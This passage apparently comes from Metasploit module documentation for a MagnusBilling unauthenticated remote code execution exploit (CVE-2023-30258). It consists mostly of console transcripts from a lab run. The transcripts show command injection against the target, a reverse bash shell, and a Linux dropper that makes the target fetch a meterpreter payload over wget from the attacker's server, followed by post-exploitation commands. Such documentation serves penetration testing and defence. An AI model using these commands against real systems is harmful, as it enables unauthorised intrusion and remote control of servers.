msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 2.1 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.34:46396) at 2023-10-24 17:09:45 +0000

uname -a
Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64 GNU/Linux
id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
pwd
/var/www/html/mbilling/lib/icepay
```
###  MagnusBilling 7 on Debian 12.2 - Linux Dropper with payload linux/x64/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 2
target => 2
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 4 seconds.
[*] Elapsed time: 4.09 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/3X16QTzG27N
[*] Client 192.168.201.34 (Wget/1.21.3) requested /3X16QTzG27N
[*] Sending payload to 192.168.201.34 (Wget/1.21.3)
[*] Sending stage (3045380 bytes) to 192.168.201.34
[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.34:55224) at 2023-10-24 17:12:05 +0000
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.34
OS           : Debian 12.2 (Linux 6.1.0-13-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: asterisk
meterpreter > pwd
/var/www/html/mbilling/lib/icepay
meterpreter >
```

## Limitations
No limitations identified.



